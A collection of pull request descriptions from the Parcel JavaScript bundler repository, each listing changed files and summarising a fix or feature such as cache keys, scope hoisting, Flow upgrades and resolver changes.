This adds `--no-scope-hoist` as a cli option for disabling scope hoisting during builds.
Test Plan:
In the react-hmr example:
* run `parcel build`. Verify:
* Sourcemaps present
* Minified output
* Scope-hoisted output (presence of `parcelRequire.register`)
* run `parcel build` with `--no-scope-hoist`, `--no-minify`, and `--no-source-maps` and verify none of those features is present in the bundles written to `dist`.
=> Allow --no-scope-hoist as a cli option for builds

packages/core/core/src/Validation.js
Since `parcelConfig` in the validation step was `any`-typed as a `ThirdPartyConfig`, the call to `validate` was not properly type-checked.
This passes `localRequire` to validators and also fixes an issue where we passed the private `ParcelOptions` to validators.
Test Plan: Test with the ts typecheck example.
=> Pass bound localRequire to validators

packages/core/parcel/README.md
This PR fixes the name of the transformer packages in the readme (https://github.com/parcel-bundler/parcel/issues/3391)
=> fix: 📝Correct the name of the transformer packages

gulpfile.js, package.json, packages/core/parcel/package.json, packages/core/parcel/src/bin.js, packages/dev/babel-preset/index.js, packages/dev/babel-preset/package.json, yarn.lock
Currently developing Parcel 2 on Linux is broken as the entire hashbang line is treated as a filepath [0]
To resolve this, in development we can conditionally require `@parcel/babel-register`. Instead of a brittle regex replacement like we do with the hashbang, we can inline a special environment variable value and run dead code elimination to remove it entirely during builds.
This was actually the intention behind using `process.env.PARCEL_BUILD_ENV` (which currently is never set) in `dumpGraphToGraphViz`. [1]
Now it's possible by running two babel plugins during production builds: 
* `babel-plugin-transform-inline-environment-variables` configured to only inline `PARCEL_BUILD_ENV`. This was chosen over `NODE_ENV` as that must remain a runtime check when the user invokes Parcel.
* …
=> Inline and DCE process.env.PARCEL_BUILD_ENV and fix Linux dev env

packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/RequestGraph.js, packages/core/integration-tests/test/watcher.js
This PR fixes an issue where updating a file by removing a dependency would screw things up because when the `asset_group` node of the dependency was being removed from the `AssetGraph`, it was attempting to remove the corresponding `asset_request` node in the `RequestGraph`, but the ids were mismatching so it was trying to remove a node from the graph that didn't exist.
=> Fix mismatching ids in request and asset graph

packages/core/integration-tests/test/integration/webpack-import-syntax-error/index.js, packages/core/integration-tests/test/integration/webpack-import-syntax-error/package.json, packages/core/integration-tests/test/resolver.js, packages/resolvers/default/src/DefaultResolver.js
This PR adds a regex check in the resolver to detect webpack's loader import syntax and throw an error.
=> Throw user friendly errors if resolver detects webpack load imports

packages/core/core/src/loadParcelConfig.js
Figured it would be good to keep this reasoning in the codebase so if someone comes back to it years from now they'll know why it was done this way.
=> Link to reasoning behind plugin name validation

packages/core/fs/package.json, packages/core/logger/package.json, packages/core/test-utils/package.json, packages/core/utils/package.json, packages/core/workers/package.json, packages/reporters/cli/package.json, packages/reporters/json/package.json, packages/shared/scope-hoisting/package.json, packages/utils/events/package.json
Removed unnecessary test-ci scripts that were left behind after unifying the test suites.
packages/utils/events/package.json:13-15
`  "scripts": {
"test-ci": "yarn test"
}
`
=> removal of test-ci scripts

packages/core/core/test/AssetGraphBuilder.test.js, packages/core/workers/test/workerfarm.js
WorkerFarms require some time to spin up, causing tests to take longer. Looking through recent CI runs, we just barely passed the prior timeout of 10s only in certain environments, so 20s should be enough.This should address the flaky test failures in recent days.
Test Plan: Re-run CI a number of times and verify all agents pass reliably.
=> Increase timeouts for unit tests requiring WorkerFarm

packages/core/install-package/src/installPackage.js, packages/core/install-package/src/validateModuleSpecifiers.js, packages/core/install-package/test/validateModuleSpecifiers.test.js, yarn.lock
This PR adds a utility in install-package that validates and fixes package names before they get installed.
See the issue this fixes for context.
Fixes #3396
=> Fix autoinstall not using proper package names

packages/core/core/src/InternalAsset.js, packages/core/core/src/Transformation.js, packages/core/types/index.js
This PR adds some information to Asset's `.commit()` cache key:
* **The input hash of the asset** - One scenario where this is necessary is when an asset jumps pipelines. For example, mdx takes a markdown asset and outputs a javascript asset and sets the type to `js`. The second pipeline also outputs an asset with type `js` while the only other things that factor into the cache key (filePath, env) don't change either so the output of the second pipeline ends up overwriting the output of the first pipeline. I also added some code to ensure that the hash gets updated when we generate at the end of a pipeline.
* **Impactful pipeline config info** - In the future we will support the same asset going through different pipelines, so we need information about the pipeline the asset was …
=> Asset content cache keys

packages/core/core/src/ReporterRunner.js, packages/core/core/src/resolveOptions.js, packages/core/core/src/types.js, packages/core/core/test/utils.js, packages/core/parcel/src/cli.js, packages/core/types/index.js, packages/dev/babel-register/index.js
Someone mentioned in the spectrum contributing channel that they were following the alias instructions in the `CONTRIBUTING.md` file and running into issues. [[Spectrum post](https://spectrum.chat/parcel/contributing/first-time-contributor-issues-with-running-local-version~966dc9fe-32ca-4498-b28e-c268b0c7689f)]
The first issue was that we are patching console before our cli reporter is set up, so nothing was getting logged when an error was being thrown during initialization. The error that was getting thrown during initialization was related to `@babel/register` trying to resolve plugins relative to the directory where parcel was called instead of the parcel repo.
Followed alias instructions in `CONTRIBUTING.md` and ran `parceldev build index.js` in a simple project outside of the parcel …
=> Fix contributing alias work flow

packages/configs/default/package.json, packages/core/core/package.json, packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/Parcel.js, packages/core/core/src/loadParcelConfig.js, packages/core/fs/package.json, packages/core/fs/src/MemoryFS.js, packages/core/fs/src/NodeFS.js, packages/core/fs/src/types.js, packages/core/install-package/src/installPackage.js, packages/core/integration-tests/test/babel.js, packages/core/integration-tests/test/postcss.js, packages/core/integration-tests/test/proxy.js, packages/core/integration-tests/test/server.js, packages/core/integration-tests/test/watcher.js, packages/core/local-require/package.json, packages/core/local-require/src/localRequire.js, packages/core/test-utils/src/utils.js, packages/core/utils/src/resolve.js, packages/reporters/dev-server/package.json, packages/reporters/dev-server/src/Server.js, packages/transformers/sass/package.json, packages/transformers/sass/src/SassTransformer.js, yarn.lock
This abstracts the filesystem access in several additional places from what we currently have. This is used in the tests to avoid writing to the real filesystem, which can cause flakiness.
* The watcher is now part of the `FileSystem` interface. `@parcel/watcher` is used by the `NodeFS` implementation, and an implementation is added for `MemoryFS`. Currently, the watchers can only be subscribed to in the main thread, not inside workers, but events created by all threads will trigger the watchers.
* The dev server now serves files using the specified filesystem implementations. This required removing the `serve-static` module and replacing it with a custom implementation that uses our fs rather than the default node fs.
* `localResolve` and `resolve` now use our filesystem as well, which …
=> Abstract filesystem in watcher, localResolve, and dev server

packages/core/core/src/BundleGraph.js, packages/core/integration-tests/test/contentHashing.js, packages/core/test-utils/src/utils.js
Resolves #3393 and Resolves #3409
Since we include a bundle's hash in filenames, anything that could possibly alter the content must be factored into what a bundle's hash is, including that a bundle can reference another bundle with a changing digest.
This extracts the current hashing strategy into `_getContentHash`, which returns a hash of the bundles own content. In `getHash`, recursively retrieve child bundle's content hashes and reflect them in the current bundle's hash. Using `traverseBundles`, which now has the option to start at a given bundle, will prevent cyclic bundle dependencies from being considered.
Test Plan: 
* Enabled the `contentHashing` integration test. 
* Temporarily removed `--no-cache` from the react-hmr example and demonstrate #3393 before applying this patch. …
=> Reflect child bundle contents in own bundle hash

packages/core/parcel-bundler/package.json, packages/core/parcel-bundler/src/utils/serializeObject.js, yarn.lock
Fixes issue #3133 by upgrading serialize-to-js from 1.1.1 to 3.0.0
Changed import in serializeObject.js to work with 3.0.0.
Create YAML import by following [https://parceljs.org/yaml.html](https://parceljs.org/yaml.html) and run.
Create TOML import by following [https://parceljs.org/toml.html](https://parceljs.org/toml.html) and run.
=>  Fixes #3133 by upgrading serialize-to-js from 1.1.1 to 3.0.0 

packages/shared/scope-hoisting/.eslintrc.json, packages/shared/scope-hoisting/src/helpers.js, packages/shared/scope-hoisting/src/prelude.js
Closes #3431, Fixes #3402
Using regex to replace comments in Javascript are error prone, let's remove the comments instead.
=> Remove eslint comments from prelude

packages/core/core/src/Transformation.js
When reading cached content for the asset in the request, we computed a key different than the one used to persist its results. Use the same key.
Test Plan: 
* Log cache keys in transformer to verify different keys were computed before.
* Log `initialCacheEntry` and verify it never had a value after multiple builds.
* Apply the fix, log cache entries again, and verify they're present
=> Use the same cache key for persisting initial asset

packages/transformers/babel/src/config.js
↪️ Pull Request
This bug was noticed when trying to run parcel globally when Babel fails to resolve the default plugins. The fix was to make sure the property `dirname` on the Babel `ConfigItem` gets added in `prepForRehydration` and gets used in `createConfigItem` in `rehydrate`. Also copied over name in case it may be needed for something.
For now I have just manually tested that running Parcel globally builds a simple JavaScript file outside of the Parcel repo. Still need to think of a good way to test this.
=> Fix bug in Babel prepForHydration/rehydrate

packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/public/BundlerBundleGraph.js, packages/core/integration-tests/test/integration/dynamic-hoist-deep/1.js, packages/core/integration-tests/test/integration/dynamic-hoist-deep/a.js, packages/core/integration-tests/test/integration/dynamic-hoist-deep/b.js, packages/core/integration-tests/test/integration/dynamic-hoist-deep/c.js, packages/core/integration-tests/test/integration/dynamic-hoist-deep/index.js, packages/core/integration-tests/test/javascript.js, packages/core/types/index.js
Use `contains` edges to reflect bundle membership, not reference edges
Since replacing an untyped edge with a reference edge prevents it from being traversed by all bundles, adjust bundling to only remove assets from bundles -- which only removes the `contains` edge signaling membership from a bundle to an asset, and only traverse a bundle's contents further if a dependency or asset belongs to the bundle.
Notes:
* `isAssetReferencedByAssetType` relied on reference edges to determine if an asset was used by another bundle. Its logic has been adjusted to see if the asset belongs to a dependency present in a bundle that it is not a part of. Maybe this needs a new name as "referenced" has a different meaning in core. cc @mischnic
* The `dynamic-hoist-deep` test has been adjusted to assert …
=> Use `contains` edges to reflect bundle membership, not reference edges

packages/core/core/src/ConfigLoader.js, packages/core/core/src/ParcelConfig.js, packages/core/core/src/Transformation.js, packages/examples/yarn.lock
Full ParcelConfigs were mistakenly set as config results and therefore stored in the RequestGraph, whose contents must be serializable.
Instead, store serialized versions of ParcelConfig and deserialize them as necessary.
Alternatives: Manually store a subset of the Parcel Config as the result, and re-create it using the `ParcelConfig` constructor rather than using the de/serializer.
Test Plan: Log the contents of the RequestGraph right before it is serialized and verify config request nodes do not contain any ParcelConfigs.
=> Store serialized Parcel Configs

packages/core/core/src/loadParcelConfig.js, packages/core/core/test/loadParcelConfig.test.js
Solves https://github.com/parcel-bundler/parcel/issues/3399
=> invalidate empty .parcelrc

packages/core/parcel-bundler/src/assets/CoffeeScriptAsset.js
The current source map information of CoffeeScript files is not correct, so it fixes this
At the following Class, https://github.com/parcel-bundler/parcel/blob/96119be782d9d551f73b77e06ab25067c7073344/packages/core/parcel-bundler/src/assets/JSAsset.js#L38 it checks for the 'map' key on rendition object, but the CoffeeScriptAsset generate function returns 'sourceMap' instead.
=> Fix source map on CoffeeScript assets

packages/core/integration-tests/test/pug.js, packages/core/test-utils/src/utils.js, packages/transformers/pug/src/PugTransformer.js
The pug transformer #3476 added the ability to check bundles had proper connected files, but the method `getConnectedFiles` was recently renamed to `getIncludedFiles` this resolves the method call.
=> Parcel V2: Fix `assertBundles` util

packages/validators/eslint/src/EslintValidator.js
In #3471, `localRequire` was abstracted away into `options.packageManager.require`.
The `EslintValidator` PR was created prior to that and was merged using the `localRequire` code.
=> Update `localRequire` to `options.packageManager.require` in ESlint Validator

packages/core/core/src/BundleGraph.js, packages/core/core/src/Graph.js, packages/core/core/src/public/MutableBundleGraph.js
We should add some safeguards to our Graph structure to maintain its integrity. This ensures that the graph can't remove an edge that doesn't exist.
=> Graph integrity: error if edge to be removed doesn't exist

packages/core/core/src/BundleGraph.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/Parcel.js, packages/core/core/src/worker.js, packages/core/integration-tests/test/scope-hoisting.js
This PR moves the checking of that package cache to the main process so that we avoid serializing the `BundleGraph` and sending it across IPC if we don't have to.
All existing integration tests pass. Manually tested against a stress test project that saw a warm build time go from ~20s to ~1s.
=> Check package cache in main process

packages/core/core/src/PackagerRunner.js, packages/transformers/babel/src/flow.js, packages/transformers/babel/src/typescript.js
Noticed when running a prod build of Parcel that there were a few places where we were importing types incorrectly. Running locally with `@babel/register` doesn't present the issue because it transpiles away the types when they are imported.
Built a project with a prod build of Parcel and made sure it ran with no errors.
=> Fix some type imports

packages/core/core/src/BundleGraph.js
Now that `summarizeBundle` is gone and the bundle graph is in a reliable state before and after `addAssetGraphToBundle`/`removeAssetGraphFromBundle`, reflect the total asset graph size in the bundle.
Notes:
* does not increase total size if the asset is already present in the bundle (is this also sufficient criteria to stop traversal together?)
* decrements total size on `removeAssetGraphFromBundle`
* also changes `getTotalSize` to stop at bundle group boundaries
Test Plan:
After bundling, log `bundle.stats.size` and `getTotalSize(bundle.getMainEntry())` and verify they are identical.
=> Reflect total asset size in bundles

packages/core/core/src/public/MutableBundleGraph.js
This corrects an issue where if bundle groups are added to the graph after incoming bundles up the tree are, connections are still made.
=> Connect bundle groups to incoming bundles

packages/core/integration-tests/test/json-reporter.js
Rather than patching and restoring `console.log` ourselves, use sinon's api for creating stubs and asserting on them.
Test Plan: `yarn test` once CI is green for other PRs
=> JSONReporter test: use a sinon stub instead of patching console ourselves

packages/core/integration-tests/test/json-reporter.js, packages/core/test-utils/src/utils.js
`run` reads and executes the js entry bundle. However, dynamic imports may have been created during the run which read their bundle contents from the filesystem at a later point in time.
Currently, awaiting `run` awaits the result of executing the bundle, but does not await the effects of dynamic imports reading in other bundles. This PR makes this so.
This also changes the json-reporter test so that it patches `console.log` within the test, not before and after it, which prevent Mocha from correctly logging the test name and its state during the run.
Test Plan: 
* Run `yarn test` a number of times without receiving an error re: missing bundle files or failure to parse json.
* Log the pending promises before they are awaited and verify that before the json-reporter test, one or more …
=> test-utils: await dynamic imports created during run()

packages/core/integration-tests/test/integration/workers-module/dedicated-worker.js, packages/core/integration-tests/test/integration/workers-module/index.js, packages/core/integration-tests/test/integration/workers-module/node_modules/foo/index.js, packages/core/integration-tests/test/integration/workers-module/package.json, packages/core/integration-tests/test/integration/workers-module/shared-worker.js, packages/core/integration-tests/test/integration/workers/worker-client.js, packages/core/integration-tests/test/javascript.js, packages/transformers/js/src/JSTransformer.js, packages/transformers/js/src/visitors/dependencies.js
Closes #2619
Closes #2732
This adds the primitive for module workers (and enables transforming them when a second argument is specified).
I don't think there there are any practical advantages to setting `type: module` (yet).
=> Add support for Workers with type: 'module'

packages/core/core/src/AssetGraph.js, packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/BundlerRunner.js
Instead of multiple graphs for runtimes, we now use a single graph, and stop when we encounter duplicated assets, rather than adding first and then removing them after.
This optimizes packaging.
=> Runtimes single graph

packages/core/core/src/AssetGraph.js, packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/Parcel.js, packages/core/core/src/applyRuntimes.js, packages/core/core/src/dumpGraphToGraphViz.js, packages/core/core/test/AssetGraphBuilder.test.js, packages/core/integration-tests/test/watcher.js, packages/core/utils/src/collection.js
This retains a copy of the runtimes graph in memory and applies necessary changes as bundle runtimes come and go. 
This also persists the runtimes asset graph on disk, and changes are applied when Parcel runs next. A `name` key was added to `AssetGraphBuilder` to differentiate it from the cache key used for the main graphs.
Test Plan: Added an integration test for runtimes being added and removed over time.
=> Cache runtimes graph in memory and on disk

.flowconfig, package.json, packages/core/source-map/src/SourceMap.js, packages/transformers/postcss/src/PostCSSTransformer.js, yarn.lock
This updates to Flow 0.109. This update enforces that read-only object types cannot have properties deleted from them.
For now, these are ignored, but we should consider alternatives before landing this. Both of these cases can be solved by creating new objects that don't contain the key that is currently deleted. Cc @DeMoorJasper on the source map case.
Test Plan: `yarn flow`
=> Update to Flow 0.109

packages/core/core/src/loadParcelPlugin.js
I think it would be helpful to fail early on plugin load rather than waiting until some core Parcel function throws a `<plugin-type>.<something>` is undefined error.
This would be pretty helpful for people who will create Parcel plugins.
Reason I created this PR is I encountered this issue: #3542 and was kinda puzzled that it didn't fail on load.
=> Plugin loader fail early

packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-classes-babel/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-classes-babel/b.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-classes-babel/package.json, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/generate.js
A statement like this doesn't get tree shaken because it does look pure (without looking at the comment).
```js
var $fa7e8a5a8249ace53223ae89975fffbd$export$default =
/*#__PURE__*/
function () {
function XYZ() {
$fa7e8a5a8249ace53223ae89975fffbd$var$_classCallCheck(this, XYZ);
}
$fa7e8a5a8249ace53223ae89975fffbd$var$_createClass(XYZ, [{
key: "method",
value: function method() {
return "abc";
}
}]);
return XYZ;
}();
```
By outputting comments when generating the code after scopehoisting (and before terser), we can leverage terser to remove everything.
This also makes it possible to allow certain comments to be preserved by terser (e.g. license headers): fixes #3322
---
We could a handle these comments in `treeShake`, but I'm not sure if there is an advantage to doing that?
`+` Smaller …
=> Let terser eliminate transpiled classes

packages/core/integration-tests/test/integration/less-postcss/index.module.less, packages/core/integration-tests/test/less.js, packages/transformers/css/src/CSSTransformer.js
In addition to checking during `parse` in the CSSTransformer (to avoid parsing all together), check for `hasDependencies` being false during transformation, which actually adds the dependencies.
In this case, PostCSS had parsed the css and produced an AST, meaning that the CSSTransformer would trace dependencies when it shouldn't have been.
Test Plan: Added a url dependency to the less+postcss integration test. Verify it fails without the additional condition in `transform`.
=> CSSTransformer: check for no dependencies during transform

azure-pipelines-template.yml
This stops Node 8 from running in CI.
Node 8 is nearing its end of life in the coming months [0], coinciding with the end of life of its version of OpenSSL. It also does not support worker threads in any form, which are a significant advantage to Parcel.
Test Plan (dependent on PR): Verify that agent list in CI does not include Node 8 on any supported platform.
[0] https://github.com/nodejs/Release#release-schedule
=> Drop Node 8 Support

packages/core/parcel/README.md
Minor fix to README - noticed a seemingly stray `flinesof` in the example code for a browser target entry point path.
=> V2: readme browser target fix

packages/transformers/babel/src/config.js
Also removes error when core-js is not found since we turned off `useBuiltins: 'usage'`. Fixes #3602.
=> Disable babel config resolution in node_modules

packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/InternalAsset.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/Transformation.js, packages/core/core/src/constants.js
This adds the version of `@parcel/core` to all of the cache keys. See [this comment](https://github.com/parcel-bundler/parcel/pull/3615#issuecomment-541236933) for reasoning. 
Resolves #3598.
Run a cold build and then a cached build and confirm that the second run skips all building and goes straight to writing cached bundles. Change `@parcel/core` version and run build again, confirming that everything is rebuilt.
=> [T-115] Version in cache keys

packages/core/parcel-bundler/src/builtins/bundle-url.js, packages/core/parcel-bundler/src/builtins/css-loader.js
Our internal runtime reports a getBundleUrl() value of "/". This breaks css reloading unless the comparison is changed to match if the link base url starts with the bundle url.
This fixes a bug that breaks an internal adobe runtime. Our runtime uses unusual URLs which fail with the current comparison.
If we change the comparison to pass if the link url starts with the bundle base URL this fixes our problem.
Since the purpose of the check is only to make sure that externally referenced css files are not reloaded, this does not break current browser behavior.
A hot reloaded local url will still not start with an external urls protocol host and port.
A typical link url in our runtime is "/src.f69400ca.css?1571167198029/"
The bundle.getBaseURL() is "/"
Hot reloading of local css files should …
=> CSS hot reloading fix for platforms with urls that lack protocol and host prefix.

packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/Parcel.js, packages/core/core/src/RequestGraph.js, packages/core/core/src/utils.js, packages/core/utils/src/PromiseQueue.js, packages/reporters/cli/src/UI.js
This implements a single top-level AbortController used for cancelling builds when new filesystem events occur that invalidate the RequestGraph.
A PromiseQueue was used to ensure that only one build is in process at a time. When a new filesystem event occurs, it enqueues a build, and cancels the previous build. 
Test Plan:
- Begin initial build
- When it enters bundling, make a change
- Verify that Parcel restarts build
- Ensure that only one build success message is printed
=> Use AbortController to cancel builds

packages/core/core/src/Transformation.js
This PR fixes an issue where postProcess functions in transforms where receiving the initial assets instead of the final assets. This corrects the issue allowing transforms to work on the final assets as expected.
I'm assuming this is what was intended with postProcess, as otherwise there is no way to interact with the final assets in a transform. This is also in line with the behaviour from v1 of Parcel.
I ran into this issue working on my vue transform.
=> Bugfix: Update post process to recive final assets rather than initial ones

packages/core/parcel-bundler/src/assets/RustAsset.js
Disclaimer : I am not a wasm or rust expert.
I tinkered with parceljs, and managed to reduce the generated wasm file from 1.6MB to 116B for the usuall `add` example.
After trying to compile rust code with parcel, I noticed that the wasm file was really big ( #3235 shows the problem). More than 1.5MB 😨. Using [twiggy](https://github.com/rustwasm/twiggy) shows that it is essentially bloat from debugs symbols.
I tried to figure out how wasm-pack optimize wasm and then tried different solutions to shrink the size on the simple `add.rs` file : 
- `-Copt-level=s` (should optimize for size): no visible effect, but it makes sense for such a simple function
- `-Clto=thin`: it reduced the size to 44kB A big win but still a lot for a simple add function. It seems some debug symbol are still there
- …
=> strip debug info from generated wasm if minify is true

packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-export-computed-prop/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-export-computed-prop/b.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-export-computed-prop/c.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/shake.js
The comment in `isExportAssignment(path)` described the expected behavior, with
```js
exports.something = someOtherThing
```
, calling `isExportAssignment(/* node of exports object*/)` returns true because `exports` can safely be removed if `exports` is only assigned in this way and `something` and `someOtherThing` are pure. 
However, it was never checked that `path` is actually the `object`  of the member expression on the left. This means that with 
```js
some_local_variable[another_local_variable] = someOtherThing;
```
, `isExportAssignment(/* node of another_local_variable */)` returned true. So the variable `another_local_variable` was removed although it *was* used (often together with this assignment, while `some_local_variable` was used!). This would cause either a ReferenceError …
=> Don't shake variables as computed property in member expressions

gulpfile.js, package.json, yarn.lock
Before:
Every once in a while, building parcel via `yarn build` would produce a JSON parsing error. This was because babel reads package.jsons which may still be writing to disk.
After:
Parcel builds consistently every time.
Test Plan:
Verified that parcel builds without errors 7 times in a row.
Verified that parcel was able to build the react-hmr example using the build results.
=> Fixed JSON parsing error by updating package.json after babel has run

packages/core/integration-tests/test/integration/scope-hoisting/commonjs/keep-local-function-var/a.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/keep-local-function-var/b.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/keep-local-function-var/c.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/link.js
Closes https://github.com/parcel-bundler/parcel/issues/3752
The is the AST state between the concat and link stage.
```js
var $parcel$global = typeof globalThis !== 'undefined' ? globalThis : typeof self !== 'undefined' ? self : typeof window !== 'undefined' ? window : typeof global !== 'undefined' ? global : {};
// ASSET: /Users/niklas/Desktop/shake-root/b.js
var $a8f3803a63b472439b25431e6fe715e$exports = {};
var $a8f3803a63b472439b25431e6fe715e$var$root = "something else";
$a8f3803a63b472439b25431e6fe715e$exports = $a8f3803a63b472439b25431e6fe715e$var$root;
// ASSET: /Users/niklas/Desktop/shake-root/a.js
var $efa628d0f351ce8b6bbf271d4b67214a$exports = function () {
var exports = this;
var module = {
exports: this
};
var root = $parcel$require("efa628d0f351ce8b6bbf271d4b67214a", "./b"); …
```
=> [T-190] Scope hoisting replaces local variable with a different variable of the same name

.flowconfig, package.json, packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/Dependency.js, packages/core/core/src/InternalAsset.js, packages/core/core/src/loadParcelConfig.js, packages/core/types/index.js, packages/transformers/js/src/visitors/dependencies.js, yarn.lock
This updates to Flow 0.112. Upgrading introduced new flow errors, some of which come from Flow 0.111 [0]:
* In the bundler, Flow understands the different states `context` can be in during traversal and errored on unexpected keys as well as values missing during phases of traversal. Since we expect traversal to happen in a particular order, such as expecting bundle groups to already be present when processing non-entry, non-async dependencies, use runtime assertions instead.
* `Dependency` and other struct-like objects expect keys to always be present. In some cases, we were spreading an object which was not guaranteed to have keys like `isAsync`, `isEntry`, etc. This makes them explicit.
* Made `ParcelConfig` and `ResolvedParcelConfig` exact object types to remove ambiguity when …
=> Upgrade to Flow 0.112

packages/core/core/src/TargetDescriptor.schema.js, packages/core/core/src/TargetResolver.js, packages/core/core/test/TargetResolver.test.js, packages/core/utils/src/schema.js
Now, all engines except `browser` are allowed (that one is easy to get wrong).
This could be done within the JSON Schema standard using something like:
`allOf( [ not( is {browser: any} ) , {*: string} ] )`
However, there is no way to generate an error message in this case, because you can't determine unambiguously what should be changed so that the entity inside of `not` fails to match. Therefore, I added a `__forbiddenProperties` array to the object entity.
cc @wbinnssmith 
Supersedes https://github.com/parcel-bundler/parcel/pull/3774.
=> Less strict engines validation

packages/core/core/src/requests.js, packages/core/integration-tests/test/watcher.js
#3428 ↪️ Pull Request
Accidentally added a regression in my `RequestGraph` refactor where rebuilds were not triggering when updating a file that failed to transform 😬 I've added a test so this should be caught in the future. I also updated and unskipped a test for rebuilding after successful transformations.
Close T-225
`yarn test:integration`
=> Rebuild correctly after failed transformations

azure-pipelines-template.yml, packages/core/test-utils/src/utils.js
I don't know why deasync just times out (Node 12.11 made worker threads stable?), but the promise to `overlayFS.readFile()` somehow never settled when using `syncPromise`.
=> Fix fs test

packages/core/integration-tests/test/javascript.js, packages/core/source-map/src/SourceMap.js, packages/transformers/coffeescript/src/CoffeeScriptTransformer.js
Fixes the `Promise could not be cloned` error in the integration test. I don't know if they are related to the flakiness on Linux (that error occurred always and on every platform, but the exit code wasn't always 1). Also adds return types to SourceMap, so that this error will be caught in the future.
Also removes the last remaining `new Buffer` calls.
=> [T-227] Coffescript sourcemap fix and Buffer deprecation warnings

packages/resolvers/default/src/DefaultResolver.js
A hotfix until we generate that list properly (T-235)
Closes #3653:
> ```
> index.html
>   index.jsx
>     useHello.js
>       hello.jsx
> ```
> 
> and ended up with the same error:
> 
> ```
>   Cannot find module './hello' from '/Users/wojciech.maj/Projekty/cfola/src'
> ```
> 
> Turns out that while `html` and `jsx` files are perfectly able to resolve `jsx` files, `js` files cannot. When I changed `hello.jsx` into `hello.js`it started building.
=> Add jsx to resolver extensions

packages/core/integration-tests/test/integration/formats/commonjs-dynamic/index.js, packages/core/integration-tests/test/integration/formats/commonjs-dynamic/other.js, packages/core/integration-tests/test/integration/formats/commonjs-dynamic/package.json, packages/core/integration-tests/test/integration/formats/commonjs-sideeffects/index.js, packages/core/integration-tests/test/integration/formats/commonjs-sideeffects/middle.js, packages/core/integration-tests/test/integration/formats/commonjs-sideeffects/other.js, packages/core/integration-tests/test/integration/formats/commonjs-sideeffects/package.json, packages/core/integration-tests/test/output-formats.js, packages/shared/scope-hoisting/src/concat.js, packages/shared/scope-hoisting/src/formats/commonjs.js
Built on #3791. Merge that first.
When `sideEffects: false` was set, CommonJS bundles that re-exported other modules were sometimes empty or missing exports. This happened when there were modules that only re-exported things from other modules. These modules were excluded because they don't have any exports of their own. However, we relied on them to insert `$parcel$exportWildcard` calls etc. Later on, in the shaking phase, the actual exported functions would be removed because they were unreferenced.
This PR adds assignments to `exports` for each exported symbol, similar to how the ES module output format works. This produces much nicer looking output than before. However, due to the dynamic nature of CommonJS input, we always include CommonJS assets even with `sideEffects: false`, and …
=> [T-234] Fix sideEffects: false with CommonJS output format

packages/core/parcel/README.md
=> chore(README.md): replace transform with transformer name

packages/core/core/src/BundleGraph.js, packages/core/integration-tests/test/integration/formats/commonjs-esm/index.js, packages/core/integration-tests/test/integration/formats/commonjs-esm/package.json, packages/core/integration-tests/test/integration/formats/commonjs-esm/re-assign.js, packages/core/integration-tests/test/integration/formats/commonjs-require/index.js, packages/core/integration-tests/test/integration/formats/commonjs-require/package.json, packages/core/integration-tests/test/output-formats.js, packages/shared/scope-hoisting/src/formats/commonjs.js, packages/shared/scope-hoisting/src/formats/esmodule.js, packages/shared/scope-hoisting/src/hoist.js, packages/shared/scope-hoisting/src/link.js, packages/shared/scope-hoisting/src/types.js
This improves support for CommonJS library builds to both ESM and CJS targets
* `require` remains a plain `require` for CJS builds (no ESM namespace import interop wrapper)
* `require` maps to a default `import` for ESM builds (assuming a future tool will perform the CJS interop if needed)
* `module.exports` maps back to `module.exports` for CJS builds
* `module.exports` maps to `export default` for ESM builds
Also improves the output a bit by getting rid of the extra empty objects for the CJS exports object where possible by assigning directly to it when `module.exports` is assigned.
=> Improve CommonJS and ESM interop for library builds

yarn.lock
Note: this only changes the yarn lockfile, which controls dependencies used in development. Parcel remains compatible with older versions of Babel when used as a dependency.
This updates the Babel versions required in our lockfile, typically around `7.7` for core packages (others have other versions, but should be their latest as of time of writing).
This was done by running `yarn upgrade-interactive` and choosing `@babel` packages as well as `core-js`.
This also runs `yarn-deduplicate` [0] against the lockfile, which consolidates a few dependencies whose version range is compatible as declared in `package.json`.
Test Plan:
* `yarn test`
* Manually reviewed changes made by `yarn-deduplicate`
[0] https://github.com/atlassian/yarn-deduplicate
=> Update Babel packages in lockfile and consolidate lockfile

packages/transformers/babel/src/babel7.js, packages/transformers/babel/src/config.js
This corrects the logic by reversing it.
Test Plan:  Verify auto-install works in a situation where the user has not provided their own copy of @babel/core, but has provided a babel config.
=> Fixup: Use bundled babel when asset is not source

packages/transformers/babel/src/babel7.js
Checking for `!asset.isSource` isn't necessary as this condition also flags `internal` to `true` in `config.js` [0]
Test Plan:
* `yarn test`
* Verify `node_modules` content is transformed with babel in a sample app
* Verify auto-install works in a situation where the user has not provided their own copy of @babel/core, but has provided a babel config.
[0] https://github.com/parcel-bundler/parcel/blob/283af2cef13bbb6b4fad7642e4acecae4f4f7cf1/packages/transformers/babel/src/config.js#L138
=> Fixup: Simplify bundled babel loading

